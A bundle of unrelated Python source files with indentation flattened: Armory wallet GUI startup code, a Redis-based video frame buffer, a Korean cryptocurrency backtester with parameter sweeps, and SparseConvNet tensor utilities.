self.walletMap[wltID].checkWalletLockTimeout()
self.signalExecution.callLater(2, self.walletTimeoutCheck)
############################################
def checkForAlreadyOpen():
from armoryengine.ProcessMutex import PySide_ProcessMutex
LOGDEBUG('Checking for already open socket...')
prc_mutex = PySide_ProcessMutex(CLI_OPTIONS.interport, None)
urilink = ""
if CLI_ARGS:
urilink = str(CLI_ARGS[0])
if prc_mutex.test(urilink) == True:
LOGERROR('Socket already in use. Sent CLI args to existing proc.')
LOGERROR('Exiting...')
os._exit(0)
############################################
if 1:
if CLI_OPTIONS.interport > 1:
checkForAlreadyOpen()
pixLogo = QPixmap(':/splashlogo.png')
if USE_TESTNET or USE_REGTEST:
pixLogo = QPixmap(':/splashlogo_testnet.png')
SPLASH = ArmorySplashScreen(pixLogo)
SPLASH.setMask(pixLogo.mask())
SPLASH.show()
QAPP.processEvents()
# Will make this customizable
QAPP.setFont(GETFONT('var'))
TheSDM = SatoshiDaemonManager()
form = ArmoryMainWindow(splashScreen=SPLASH)
form.show()
SPLASH.finish(form)
QAPP.setQuitOnLastWindowClosed(True)
os._exit(QAPP.exec_())
|
inmemory_buffer.py
|
# Copyright 2020 Wearless Tech Inc All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import threading
from typing import MutableSequence
import av
import base64
import redis
import json
import sys
import io
import numpy as np
import time
from proto import video_streaming_pb2
import multiprocessing
# constants from global vars
from global_vars import RedisInMemoryBufferChannel,RedisInMemoryDecodedImagesPrefix, RedisInMemoryIFrameListPrefix,RedisCodecVideoInfo,RedisInMemoryQueuePrefix
def memoryCleanup(redis_conn, device_id):
'''
Cleanup redis memory
'''
redis_conn.delete(RedisInMemoryQueuePrefix+device_id) # the complete memory buffer of compressed stream
redis_conn.delete(RedisInMemoryIFrameListPrefix+device_id) # all keys for stored i-frames
redis_conn.delete(RedisInMemoryDecodedImagesPrefix+device_id) # all decoded in-memory buffer images
def setCodecInfo(redis_conn, in_av_container,deviceId):
'''
Sets the current streams codec info at the same time clean out the in memory redis queues
'''
streams = in_av_container.streams
if len(streams) > 0:
for stream in streams:
if stream.type == "video":
codec_ctx = stream.codec_context
vc = video_streaming_pb2.VideoCodec()
vc.name = codec_ctx.name
vc.long_name = codec_ctx.codec.long_name
vc.width = codec_ctx.width
vc.height = codec_ctx.height
vc.pix_fmt = codec_ctx.pix_fmt
vc.extradata = codec_ctx.extradata
vc.extradata_size = codec_ctx.extradata_size
vcData = vc.SerializeToString()
redis_conn.set(RedisCodecVideoInfo+deviceId, vcData)
def getCodecInfo(redis_conn, deviceId):
'''
Reading the current video stream codec info from redis
'''
info = redis_conn.get(RedisCodecVideoInfo+deviceId)
if info is not None:
vc = video_streaming_pb2.VideoCodec()
vc.ParseFromString(info)
return vc
return None
def packetToInMemoryBuffer(redis_conn,memory_buffer_size, device_id,in_av_container, packet):
if memory_buffer_size > 0:
redisStreamName = RedisInMemoryQueuePrefix + device_id
redisIFrameList = RedisInMemoryIFrameListPrefix + device_id
for stream in in_av_container.streams:
if stream.type == "video":
codec_ctx = stream.codec_context
video_height = codec_ctx.height
video_width = codec_ctx.width
is_keyframe = packet.is_keyframe
packetBytes = packet.to_bytes()
codec_name = codec_ctx.name
pix_fmt = codec_ctx.pix_fmt
vf = video_streaming_pb2.VideoFrame()
vf.data = packetBytes
vf.width = video_width
vf.height = video_height
vf.timestamp = int(packet.pts * float(packet.time_base))
vf.pts = packet.pts
vf.dts = packet.dts
vf.keyframe = is_keyframe
vf.time_base = float(packet.time_base)
vf.is_keyframe = packet.is_keyframe
vf.is_corrupt = packet.is_corrupt
vf.codec_name = codec_name
vf.pix_fmt = pix_fmt
vfData = vf.SerializeToString()
keyframe = 0
if is_keyframe:
keyframe = 1
redis_conn.xadd(redisIFrameList, {'keyframe':keyframe}, maxlen=memory_buffer_size)
redis_conn.xadd(redisStreamName, {'data': vfData, 'is_keyframe': keyframe}, maxlen=memory_buffer_size)
class InMemoryBuffer(threading.Thread):
'''
InMemoryBuffer stores packet by packet incoming video stream to redis queue
'''
def __init__(self, device_id, memory_scale, redis_conn):
threading.Thread.__init__(self)
self.__redis_conn = redis_conn
self.__device_id = device_id
self.__filter_scale = memory_scale
def run(self):
codec_info = getCodecInfo(self.__redis_conn, self.__device_id)
while codec_info is None:
codec_info = getCodecInfo(self.__redis_conn, self.__device_id)
time.sleep(0.1)
ps = self.__redis_conn.pubsub()
ps.subscribe(RedisInMemoryBufferChannel)
for psMsg in ps.listen():
if "data" in psMsg:
base64Msg = psMsg["data"]
if isinstance(base64Msg, (bytes, bytearray)):
data = json.loads(base64.b64decode(base64Msg))
if "deviceId" in data:
deviceId = data["deviceId"]
fromTs = data["fromTimestamp"]
toTs = data["toTimestamp"]
requestID = data["requestId"]
p = multiprocessing.Process(target=self.query_results, args=(codec_info, requestID, deviceId, fromTs, toTs, ))
p.daemon = True
p.start()
# we don't wait for process to finish here. It should finish on it's own or fail
def query_results(self, codec_info, requestID, deviceId, fromTs, toTs):
decoder = av.CodecContext.create(codec_info.name,'r')
decoder.width = codec_info.width
decoder.height = codec_info.height
decoder.pix_fmt = codec_info.pix_fmt
decoder.extradata = codec_info.extradata # important for decoding (PPS, SPS)
decoder.thread_type = 'AUTO'
# print("Available filters: ", av.filter.filters_available)
# settings default memory scaling grpah for in memory queue
graph = av.filter.Graph()
fchain = [graph.add_buffer(width=codec_info.width, height=codec_info.height, format=codec_info.pix_fmt, name=requestID)]
fchain.append(graph.add("scale",self.__filter_scale))
fchain[-2].link_to(fchain[-1])
fchain.append(graph.add('buffersink'))
fchain[-2].link_to(fchain[-1])
graph.configure()
decodedStreamName = RedisInMemoryDecodedImagesPrefix + deviceId + requestID
iframeStreamName = RedisInMemoryIFrameListPrefix + deviceId
# this is where we start our query
queryTs = self.findClosestIFrameTimestamp(iframeStreamName, fromTs)
print("Starting to decode in-memory GOP: ", deviceId, fromTs, toTs, queryTs)
streamName = RedisInMemoryQueuePrefix + deviceId
# sanity check for timestampTo
redis_time = self.__redis_conn.time()
redis_time = int(redis_time[0] + (redis_time[1] / 1000000)) * 1000
if toTs > redis_time:
toTs = redis_time
firstIFrameFound = False # used when fromTS is before anything in queue at all (so first I-frame picket)
while True:
buffer = self.__redis_conn.xread({streamName: queryTs}, count=30)
if len(buffer) > 0:
arr = buffer[0]
inner_buffer = arr[1]
last = inner_buffer[-1]
queryTs = last[0] # remember where to query from next
# check if we've read everything, exit loop
last = int(queryTs.decode('utf-8').split("-")[0])
if last >= int(toTs):
print("inmemory buffer decoding finished")
break
for compressed in inner_buffer:
compressedData = compressed[1]
content = {}
for key, value in compressedData.items():
content[key.decode("utf-8")] = value
if content["is_keyframe"].decode('utf-8') == "0" and firstIFrameFound is False:
print("First I-Frame found")
firstIFrameFound = True
if not firstIFrameFound:
print("skipping first I-Frame search, going next")
continue
vf = video_streaming_pb2.VideoFrame()
vf.ParseFromString(content["data"])
frame_buf = io.BytesIO(vf.data)
size = frame_buf.getbuffer().nbytes
packet = av.Packet(size)
frame_buf.readinto(packet)
# packet.pts = vf.pts
# packet.dts = vf.dts
frames = decoder.decode(packet) or () # should be only 1 frame per packet (for video)
if len(frames) <= 0:
continue
self.addToRedisDecodedImage(graph, decodedStreamName, frames, packet)
# signal finish (None video frame)
self.addToRedisDecodedImage(graph, decodedStreamName, None, None)
# finding the closest timestamp and allowing queryies such as timeFrom=0 and timeTo=sys.maxsize
def findClosestIFrameTimestamp(self, streamName, fromTs):
'''
Finds the closest timestamp at exact or before the fromTimestamp in a small queue of iframes
'''
searchTs = fromTs
min = sys.maxsize
all_i_frames = self.__redis_conn.xread({streamName:0}) # read all in queue
if len(all_i_frames) > 0:
all = all_i_frames[0]
if len(all) > 1:
iframe_timestamps = all[1]
for (i, iframe_ts) in enumerate(iframe_timestamps):
its = str(iframe_ts[0], 'utf-8')
ts = int(its.split("-")[0])
if i == 0:
searchTs = its
continue
if ts >= int(fromTs): # stop search (we want only I-frame before fromTs)
break
# we're always looking for an iframe before fromTs
min_abs_candidate = abs(int(fromTs) - ts)
if min_abs_candidate < min:
searchTs = its
min = min_abs_candidate
# (- 1 ms since xread is exclusive)
splitted = searchTs.split("-")
ts = splitted[0]
tsPart = splitted[1]
print("found key frame: ", ts, tsPart)
return str(int(ts)-1) + "-" + tsPart
def addToRedisDecodedImage(self, graph, streamName, frames, packet):
'''
Converting the raw frame to Protobuf shape and extracing info from the packet
'''
if frames is None: # signal finish of in-memory buffer read
vf = video_streaming_pb2.VideoFrame()
vfData = vf.SerializeToString()
self.pushDecodedToRedis(streamName, vfData)
return
# push decoded frames to redis to be read by server and served back through GRPC
for frame in frames:
graph.push(frame)
keepPulling = True
while keepPulling:
try:
frame = graph.pull()
img = frame.to_ndarray(format='bgr24')
shape = img.shape
img_bytes = np.ndarray.tobytes(img)
timestamp = int(time.time() * 1000)
if packet.pts is not None and packet.time_base is not None:
timestamp = int(packet.pts * float(packet.time_base))
vf = video_streaming_pb2.VideoFrame()
vf.data = img_bytes
vf.width = frame.width
vf.height = frame.height
vf.timestamp = timestamp
vf.frame_type = frame.pict_type.name
if packet.pts:
vf.pts = packet.pts
if packet.dts:
vf.dts = packet.dts
if packet.time_base is not None:
vf.time_base = float(packet.time_base)
vf.is_keyframe = packet.is_keyframe
vf.is_corrupt = packet.is_corrupt
for (i,dim) in enumerate(shape):
newDim = video_streaming_pb2.ShapeProto.Dim()
newDim.size = dim
newDim.name = str(i)
vf.shape.dim.append(newDim)
vfData = vf.SerializeToString()
self.pushDecodedToRedis(streamName, vfData)
except Exception as e:
keepPulling = False
def pushDecodedToRedis(self, streamName, vfData):
'''
Push the frame protobuf to redis into xstream.
The max size of decoded xstream is 10 images (to limit memory consumption)
This buffer is being continously emptied by server upon each read
'''
# in case reading is slow, then this waits until some memory is freed
# this is due to raw images being stored in memory (e.g. 800x600 RGB would be 4.3MB approx per image)
started_check = int(time.time() * 1000)
while True:
# safety - if reading takes really long (more than 10 seconds, then exit this immidately)
current_check = int(time.time() * 1000)
if current_check - started_check > (1000 * 10):
break
cnt = self.__redis_conn.xlen(streamName)
if cnt >= 10:
time.sleep(0.1)
else:
break
self.__redis_conn.xadd(streamName, {'data': vfData}, maxlen=10)
|
backtester_coin_vc.py
|
import os
import sys
import sqlite3
import pandas as pd
from matplotlib import pyplot as plt
from multiprocessing import Process, Queue
sys.path.append(os.path.dirname(os.path.abspath(os.path.dirname(__file__))))
from utility.static import now, strf_time, timedelta_day
from utility.setting import db_setting, db_backtest, db_coin_tick, graph_path
class BackTester2Coin:
def __init__(self, q_, ticker_list_, num_, high):
self.q = q_
self.ticker_list = ticker_list_
self.high = high
if type(num_[3]) == list:
self.batting = num_[0]
self.testperiod = num_[1]
self.totaltime = num_[2]
self.gap_ch = num_[3][0]
self.avg_time = num_[4][0]
self.gap_sm = num_[5][0]
self.ch_low = num_[6][0]
self.dm_low = num_[7][0]
self.per_low = num_[8][0]
self.per_high = num_[9][0]
self.cs_per = num_[10][0]
else:
self.batting = num_[0]
self.testperiod = num_[1]
self.totaltime = num_[2]
self.gap_ch = num_[3]
self.avg_time = num_[4]
self.gap_sm = num_[5]
self.ch_low = num_[6]
self.dm_low = num_[7]
self.per_low = num_[8]
self.per_high = num_[9]
self.cs_per = num_[10]
self.ticker = None
self.df = None
self.totalcount = 0
self.totalcount_p = 0
self.totalcount_m = 0
self.totalholdday = 0
self.totaleyun = 0
self.totalper = 0.
self.hold = False
self.buycount = 0
self.buyprice = 0
self.sellprice = 0
self.index = 0
self.indexb = 0
self.indexn = 0
self.ccond = 0
self.csell = 0
self.Start()
def Start(self):
conn = sqlite3.connect(db_coin_tick)
tcount = len(self.ticker_list)
int_daylimit = int(strf_time('%Y%m%d', timedelta_day(-self.testperiod)))
for k, ticker in enumerate(self.ticker_list):
self.ticker = ticker
self.df = pd.read_sql(f"SELECT * FROM '{ticker}'", conn)
self.df = self.df.set_index('index')
self.df['고저평균대비등락율'] = (self.df['현재가'] / ((self.df['고가'] + self.df['저가']) / 2) - 1) * 100
self.df['고저평균대비등락율'] = self.df['고저평균대비등락율'].round(2)
self.df['체결강도'] = self.df['누적매수량'] / self.df['누적매도량'] * 100
self.df['체결강도'] = self.df['체결강도'].round(2)
self.df['직전체결강도'] = self.df['체결강도'].shift(1)
self.df['직전누적거래대금'] = self.df['누적거래대금'].shift(1)
self.df = self.df.fillna(0)
self.df['거래대금'] = self.df['누적거래대금'] - self.df['직전누적거래대금']
self.df['직전거래대금'] = self.df['거래대금'].shift(1)
self.df = self.df.fillna(0)
self.df['거래대금평균'] = self.df['직전거래대금'].rolling(window=self.avg_time).mean()
self.df['체결강도평균'] = self.df['직전체결강도'].rolling(window=self.avg_time).mean()
self.df['최고체결강도'] = self.df['직전체결강도'].rolling(window=self.avg_time).max()
self.df = self.df.fillna(0)
self.totalcount = 0
self.totalcount_p = 0
self.totalcount_m = 0
self.totalholdday = 0
self.totaleyun = 0
self.totalper = 0.
self.ccond = 0
lasth = len(self.df) - 1
for h, index in enumerate(self.df.index):
if h != 0 and index[:8] != self.df.index[h - 1][:8]:
self.ccond = 0
if int(index[:8]) < int_daylimit or \
(not self.hold and (210000 <= int(index[8:]) or int(index[8:]) < 10000)):
continue
self.index = index
self.indexn = h
self.ccond += 1
if not self.hold and 10000 < int(index[8:]) < 210000 and self.BuyTerm():
self.Buy()
elif self.hold and 10000 < int(index[8:]) < 210000 and self.SellTerm():
self.Sell()
elif self.hold and (h == lasth or int(index[8:]) >= 210000 > int(self.df.index[h - 1][8:])):
self.Sell()
self.Report(k + 1, tcount)
conn.close()
def BuyTerm(self):
if type(self.df['현재가'][self.index]) == pd.Series:
return False
if self.ccond < self.avg_time:
return False
# 전략 비공개
return True
def Buy(self):
if self.df['매도호가1'][self.index] * self.df['매도잔량1'][self.index] >= self.batting:
s1hg = self.df['매도호가1'][self.index]
self.buycount = int(self.batting / s1hg)
self.buyprice = s1hg
else:
s1hg = self.df['매도호가1'][self.index]
s1jr = self.df['매도잔량1'][self.index]
s2hg = self.df['매도호가2'][self.index]
ng = self.batting - s1hg * s1jr
s2jc = int(ng / s2hg)
self.buycount = s1jr + s2jc
self.buyprice = round((s1hg * s1jr + s2hg * s2jc) / self.buycount, 2)
if self.buycount == 0:
return
self.hold = True
self.indexb = self.indexn
self.csell = 0
def SellTerm(self):
if type(self.df['현재가'][self.index]) == pd.Series:
return False
if self.df['등락율'][self.index] > 29:
return True
bg = self.buycount * self.buyprice
cg = self.buycount * self.df['현재가'][self.index]
eyun, per = self.GetEyunPer(bg, cg)
# 전략 비공개
return False
def Sell(self):
if self.df['매수잔량1'][self.index] >= self.buycount:
self.sellprice = self.df['매수호가1'][self.index]
else:
b1hg = self.df['매수호가1'][self.index]
b1jr = self.df['매수잔량1'][self.index]
b2hg = self.df['매수호가2'][self.index]
nc = self.buycount - b1jr
self.sellprice = round((b1hg * b1jr + b2hg * nc) / self.buycount, 2)
self.hold = False
self.CalculationEyun()
self.indexb = 0
def CalculationEyun(self):
self.totalcount += 1
bg = self.buycount * self.buyprice
cg = self.buycount * self.sellprice
eyun, per = self.GetEyunPer(bg, cg)
self.totalper = round(self.totalper + per, 2)
self.totaleyun = int(self.totaleyun + eyun)
self.totalholdday += self.indexn - self.indexb
if per > 0:
self.totalcount_p += 1
else:
self.totalcount_m += 1
if self.high:
self.q.put([self.index, self.ticker, per, eyun])
# noinspection PyMethodMayBeStatic
def GetEyunPer(self, bg, cg):
gtexs = cg * 0.0023
gsfee = cg * 0.00015
gbfee = bg * 0.00015
texs = gtexs - (gtexs % 1)
sfee = gsfee - (gsfee % 10)
bfee = gbfee - (gbfee % 10)
pg = int(cg - texs - sfee - bfee)
eyun = pg - bg
per = round(eyun / bg * 100, 2)
return eyun, per
def Report(self, count, tcount):
if self.totalcount > 0:
plus_per = round((self.totalcount_p / self.totalcount) * 100, 2)
avgholdday = round(self.totalholdday / self.totalcount, 2)
self.q.put([self.ticker, self.totalcount, avgholdday, self.totalcount_p, self.totalcount_m,
plus_per, self.totalper, self.totaleyun])
ticker, totalcount, avgholdday, totalcount_p, totalcount_m, plus_per, totalper, totaleyun = \
self.GetTotal(plus_per, avgholdday)
print(f" 종목코드 {ticker} | 평균보유기간 {avgholdday}초 | 거래횟수 {totalcount}회 | "
f" 익절 {totalcount_p}회 | 손절 {totalcount_m}회 | 승률 {plus_per}% |"
f" 수익률 {totalper}% | 수익금 {totaleyun}원 [{count}/{tcount}]")
else:
self.q.put([self.ticker, 0, 0, 0, 0, 0., 0., 0])
def GetTotal(self, plus_per, avgholdday):
ticker = str(self.ticker)
ticker = ticker + ' ' if len(ticker) == 6 else ticker
ticker = ticker + ' ' if len(ticker) == 7 else ticker
ticker = ticker + ' ' if len(ticker) == 8 else ticker
ticker = ticker + ' ' if len(ticker) == 9 else ticker
totalcount = str(self.totalcount)
totalcount = ' ' + totalcount if len(totalcount) == 1 else totalcount
totalcount = ' ' + totalcount if len(totalcount) == 2 else totalcount
avgholdday = str(avgholdday)
avgholdday = ' ' + avgholdday if len(avgholdday.split('.')[0]) == 1 else avgholdday
avgholdday = ' ' + avgholdday if len(avgholdday.split('.')[0]) == 2 else avgholdday
avgholdday = ' ' + avgholdday if len(avgholdday.split('.')[0]) == 3 else avgholdday
avgholdday = ' ' + avgholdday if len(avgholdday.split('.')[0]) == 4 else avgholdday
avgholdday = avgholdday + '0' if len(avgholdday.split('.')[1]) == 1 else avgholdday
totalcount_p = str(self.totalcount_p)
totalcount_p = ' ' + totalcount_p if len(totalcount_p) == 1 else totalcount_p
totalcount_p = ' ' + totalcount_p if len(totalcount_p) == 2 else totalcount_p
totalcount_m = str(self.totalcount_m)
totalcount_m = ' ' + totalcount_m if len(totalcount_m) == 1 else totalcount_m
totalcount_m = ' ' + totalcount_m if len(totalcount_m) == 2 else totalcount_m
plus_per = str(plus_per)
plus_per = ' ' + plus_per if len(plus_per.split('.')[0]) == 1 else plus_per
plus_per = ' ' + plus_per if len(plus_per.split('.')[0]) == 2 else plus_per
plus_per = plus_per + '0' if len(plus_per.split('.')[1]) == 1 else plus_per
totalper = str(self.totalper)
totalper = ' ' + totalper if len(totalper.split('.')[0]) == 1 else totalper
totalper = ' ' + totalper if len(totalper.split('.')[0]) == 2 else totalper
totalper = ' ' + totalper if len(totalper.split('.')[0]) == 3 else totalper
totalper = totalper + '0' if len(totalper.split('.')[1]) == 1 else totalper
totaleyun = format(self.totaleyun, ',')
if len(totaleyun.split(',')) == 1:
totaleyun = ' ' + totaleyun if len(totaleyun.split(',')[0]) == 1 else totaleyun
totaleyun = ' ' + totaleyun if len(totaleyun.split(',')[0]) == 2 else totaleyun
totaleyun = ' ' + totaleyun if len(totaleyun.split(',')[0]) == 3 else totaleyun
totaleyun = ' ' + totaleyun if len(totaleyun.split(',')[0]) == 4 else totaleyun
elif len(totaleyun.split(',')) == 2:
totaleyun = ' ' + totaleyun if len(totaleyun.split(',')[0]) == 1 else totaleyun
totaleyun = ' ' + totaleyun if len(totaleyun.split(',')[0]) == 2 else totaleyun
totaleyun = ' ' + totaleyun if len(totaleyun.split(',')[0]) == 3 else totaleyun
totaleyun = ' ' + totaleyun if len(totaleyun.split(',')[0]) == 4 else totaleyun
elif len(totaleyun.split(',')) == 3:
totaleyun = ' ' + totaleyun if len(totaleyun.split(',')[0]) == 1 else totaleyun
return ticker, totalcount, avgholdday, totalcount_p, totalcount_m, plus_per, totalper, totaleyun
class Total:
def __init__(self, q_, last_, num_):
super().__init__()
self.q = q_
self.last = last_
if type(num_[3]) == list:
self.batting = num_[0]
self.testperiod = num_[1]
self.totaltime = num_[2]
self.gap_ch = num_[3][0]
self.avg_time = num_[4][0]
self.gap_sm = num_[5][0]
self.ch_low = num_[6][0]
self.dm_low = num_[7][0]
self.per_low = num_[8][0]
self.per_high = num_[9][0]
self.cs_per = num_[10][0]
else:
self.batting = num_[0]
self.testperiod = num_[1]
self.totaltime = num_[2]
self.gap_ch = num_[3]
self.avg_time = num_[4]
self.gap_sm = num_[5]
self.ch_low = num_[6]
self.dm_low = num_[7]
self.per_low = num_[8]
self.per_high = num_[9]
self.cs_per = num_[10]
self.Start()
def Start(self):
columns1 = ['거래횟수', '평균보유기간', '익절', '손절', '승률', '수익률', '수익금']
columns2 = ['필요자금', '종목출현빈도수', '거래횟수', '평균보유기간', '익절', '손절', '승률',
'평균수익률', '수익률합계', '수익금합계', '체결강도차이', '평균시간', '거래대금차이',
'체결강도하한', '누적거래대금하한', '등락율하한', '등락율상한', '청산수익률']
df_back = pd.DataFrame(columns=columns1)
df_tsg = pd.DataFrame(columns=['종목명', 'per', 'ttsg'])
k = 0
while True:
data = self.q.get()
if len(data) == 4:
if data[0] in df_tsg.index:
df_tsg.at[data[0]] = df_tsg['종목명'][data[0]] + ';' + data[1], \
df_tsg['per'][data[0]] + data[2], \
df_tsg['ttsg'][data[0]] + data[3]
else:
df_tsg.at[data[0]] = data[1], data[2], data[3]
else:
df_back.at[data[0]] = data[1], data[2], data[3], data[4], data[5], data[6], data[7]
k += 1
if k == self.last:
break
tsp = 0
if len(df_back) > 0:
text = [self.gap_ch, self.avg_time, self.gap_sm, self.ch_low, self.dm_low,
self.per_low, self.per_high, self.cs_per]
print(f' {text}')
tc = df_back['거래횟수'].sum()
if tc != 0:
pc = df_back['익절'].sum()
mc = df_back['손절'].sum()
pper = round(pc / tc * 100, 2)
df_back_ = df_back[df_back['평균보유기간'] != 0]
avghold = round(df_back_['평균보유기간'].sum() / len(df_back_), 2)
avgsp = round(df_back['수익률'].sum() / tc, 2)
tsg = int(df_back['수익금'].sum())
onedaycount = round(tc / self.totaltime, 4)
onegm = int(self.batting * onedaycount * avghold)
if onegm < self.batting:
onegm = self.batting
tsp = round(tsg / onegm * 100, 4)
text = f" 종목당 배팅금액 {format(self.batting, ',')}원, 필요자금 {format(onegm, ',')}원, "\
f" 종목출현빈도수 {onedaycount}개/초, 거래횟수 {tc}회, 평균보유기간 {avghold}초,\n 익절 {pc}회, "\
f" 손절 {mc}회, 승률 {pper}%, 평균수익률 {avgsp}%, 수익률합계 {tsp}%, 수익금합계 {format(tsg, ',')}원"
print(text)
df_back = pd.DataFrame(
[[onegm, onedaycount, tc, avghold, pc, mc, pper, avgsp, tsp, tsg, self.gap_ch, self.avg_time,
self.gap_sm, self.ch_low, self.dm_low, self.per_low, self.per_high, self.cs_per]],
columns=columns2, index=[strf_time('%Y%m%d%H%M%S')])
conn = sqlite3.connect(db_backtest)
df_back.to_sql(f"{strf_time('%Y%m%d')}_2c", conn, if_exists='append', chunksize=1000)
conn.close()
if len(df_tsg) > 0:
df_tsg['체결시간'] = df_tsg.index
df_tsg.sort_values(by=['체결시간'], inplace=True)
df_tsg['ttsg_cumsum'] = df_tsg['ttsg'].cumsum()
df_tsg[['ttsg', 'ttsg_cumsum']] = df_tsg[['ttsg', 'ttsg_cumsum']].astype(int)
conn = sqlite3.connect(db_backtest)
df_tsg.to_sql(f"{strf_time('%Y%m%d')}_2t", conn, if_exists='replace', chunksize=1000)
conn.close()
df_tsg.plot(figsize=(12, 9), rot=45)
plt.savefig(f"{graph_path}/C{strf_time('%Y%m%d')}_2.png")
conn = sqlite3.connect(db_setting)
cur = conn.cursor()
query = f"UPDATE coin SET 체결강도차이2 = {self.gap_ch}, 평균시간2 = {self.avg_time}, "\
f"거래대금차이2 = {self.gap_sm}, 체결강도하한2 = {self.ch_low}, 누적거래대금하한2 = {self.dm_low}, "\
f"등락율하한2 = {self.per_low}, 등락율상한2 = {self.per_high}, 청산수익률2 = {self.cs_per}"
cur.execute(query)
conn.commit()
conn.close()
else:
self.q.put(tsp)
if __name__ == "__main__":
start = now()
con = sqlite3.connect(db_coin_tick)
df = pd.read_sql("SELECT name FROM sqlite_master WHERE TYPE = 'table'", con)
con.close()
table_list = list(df['name'].values)
last = len(table_list)
q = Queue()
batting = int(sys.argv[1]) * 1000000
testperiod = int(sys.argv[2])
totaltime = int(sys.argv[3])
gap_chs = [float(sys.argv[4]), float(sys.argv[5]), float(sys.argv[6]),
float(sys.argv[7]), float(sys.argv[8]), float(sys.argv[9]), float(sys.argv[10])]
avg_times = [int(sys.argv[13]), int(sys.argv[14]), int(sys.argv[15]),
int(sys.argv[16]), int(sys.argv[17]), int(sys.argv[18])]
htsp = -1000
high_var = []
print(int(sys.argv[21]))
for gap_ch in gap_chs:
for avg_time in avg_times:
num = [batting, testperiod, totaltime, gap_ch, avg_time, int(sys.argv[21]), float(sys.argv[25]),
int(sys.argv[29]), float(sys.argv[33]), float(sys.argv[37]), float(sys.argv[41])]
w = Process(target=Total, args=(q, last, num))
w.start()
procs = []
workcount = int(last / int(sys.argv[45])) + 1
for j in range(0, last, workcount):
ticker_list = table_list[j:j + workcount]
p = Process(target=BackTester2Coin, args=(q, ticker_list, num, False))
procs.append(p)
p.start()
for p in procs:
p.join()
w.join()
sp = q.get()
if sp >= htsp:
htsp = sp
high_var = num
print(f' 최고수익률 갱신 {htsp}%')
gap_ch = [high_var[3] - float(sys.argv[11]) * 9, high_var[3] + float(sys.argv[11]) * 9,
float(sys.argv[11]), float(sys.argv[12])]
avg_time = [high_var[4], high_var[4], int(sys.argv[19]), int(sys.argv[20])]
gap_sm = [int(sys.argv[21]), int(sys.argv[22]), int(sys.argv[23]), int(sys.argv[24])]
ch_low = [float(sys.argv[25]), float(sys.argv[26]), float(sys.argv[27]), float(sys.argv[28])]
dm_low = [int(sys.argv[29]), int(sys.argv[30]), int(sys.argv[31]), int(sys.argv[32])]
per_low = [float(sys.argv[33]), float(sys.argv[34]), float(sys.argv[35]), float(sys.argv[36])]
per_high = [float(sys.argv[37]), float(sys.argv[38]), float(sys.argv[39]), float(sys.argv[40])]
cs_per = [float(sys.argv[41]), float(sys.argv[42]), float(sys.argv[43]), float(sys.argv[44])]
num = [batting, testperiod, totaltime, gap_ch, avg_time, gap_sm, ch_low, dm_low, per_low, per_high, cs_per]
ogin_var = high_var[3]
high_var = high_var[3]
i = 3
while True:
w = Process(target=Total, args=(q, last, num))
w.start()
procs = []
workcount = int(last / int(sys.argv[45])) + 1
for j in range(0, last, workcount):
ticker_list = table_list[j:j + workcount]
p = Process(target=BackTester2Coin, args=(q, ticker_list, num, False))
procs.append(p)
p.start()
for p in procs:
p.join()
w.join()
sp = q.get()
if sp >= htsp:
htsp = sp
high_var = num[i][0]
print(f' 최고수익률 갱신 {htsp}%')
if num[i][0] == num[i][1]:
num[i][0] = high_var
if num[i][2] != num[i][3]:
if num[i][0] != ogin_var:
num[i][0] -= num[i][2]
num[i][1] = round(num[i][0] + num[i][2] * 2 - num[i][3], 1)
else:
num[i][1] = round(num[i][0] + num[i][2] - num[i][3], 1)
num[i][2] = num[i][3]
elif i < len(num) - 1:
i += 1
ogin_var = num[i][0]
high_var = num[i][0]
if i == 4:
if num[i][0] != int(sys.argv[13]):
num[i][0] -= num[i][2]
num[i][1] = round(num[i][0] + num[i][2] * 2 - num[i][3], 1)
else:
num[i][1] = round(num[i][0] + num[i][2] - num[i][3], 1)
num[i][2] = num[i][3]
else:
break
num[i][0] = round(num[i][0] + num[i][2], 1)
w = Process(target=Total, args=(q, last, num))
w.start()
procs = []
workcount = int(last / float(sys.argv[45])) + 1
for j in range(0, last, workcount):
db_list = table_list[j:j + workcount]
p = Process(target=BackTester2Coin, args=(q, db_list, num, True))
procs.append(p)
p.start()
for p in procs:
p.join()
w.join()
end = now()
print(f" 백테스팅 소요시간 {end - start}")
|
utils.py
|
# Copyright 2016-present, Facebook, Inc.
# All rights reserved.
#
# This source code is licensed under the BSD-style license found in the
# LICENSE file in the root directory of this source tree.
import torch, glob, os, numpy as np
from .sparseConvNetTensor import SparseConvNetTensor
from .metadata import Metadata
def toLongTensor(dimension, x):
if hasattr(x, 'type') and x.type() == 'torch.LongTensor':
return x
elif isinstance(x, (list, tuple)):
assert len(x) == dimension
return torch.LongTensor(x)
else:
return torch.LongTensor(dimension).fill_(x)
def optionalTensor(a, b):
return getattr(a, b) if hasattr(a, b) else torch.Tensor()
def optionalTensorReturn(a):
return a if a.numel() else None
def threadDatasetIterator(d):
try:
import queue
except BaseException:
import Queue as queue
import threading
def iterator():
def worker(i):
for k in range(i, len(d), 8):
q.put(d[k])
q = queue.Queue(16)
for i in range(8):
t = threading.Thread(target=worker, args=(i,))
t.start()
for _ in range(len(d)):
item = q.get()
yield item
q.task_done()
q.join()
return iterator
def concatenate_feature_planes(input):
output = SparseConvNetTensor()
output.metadata = input[0].metadata
output.spatial_size = input[0].spatial_size
output.features = torch.cat([i.features for i in input], 1)
return output
def add_feature_planes(input):
output = SparseConvNetTensor()
output.metadata = input[0].metadata
output.spatial_size = input[0].spatial_size
output.features = sum([i.features for i in input])
return output
def append_tensors(tensors):
spatial_size=tensors[0].spatial_size
dimension=len(spatial_size)
x=SparseConvNetTensor(
features=torch.cat([t.features for t in tensors],0),
metadata=Metadata(dimension),
spatial_size=spatial_size)
for t in tensors:
x.metadata.appendMetadata(t.metadata,spatial_size)
return x
class AddCoords(torch.nn.Module):
def forward(self, input):
output = SparseConvNetTensor()
if input.features.numel():
with torch.no_grad():
coords = input.get_spatial_locations()
d = (input.spatial_size.type_as(input.features)-1)/2
coords=coords[:,:-1].type_as(input.features)/ d[None,:] - 1
output.features = torch.cat([input.features,coords],1)
else:
output.features = input.features
output.metadata = input.metadata
output.spatial_size = input.spatial_size
return output
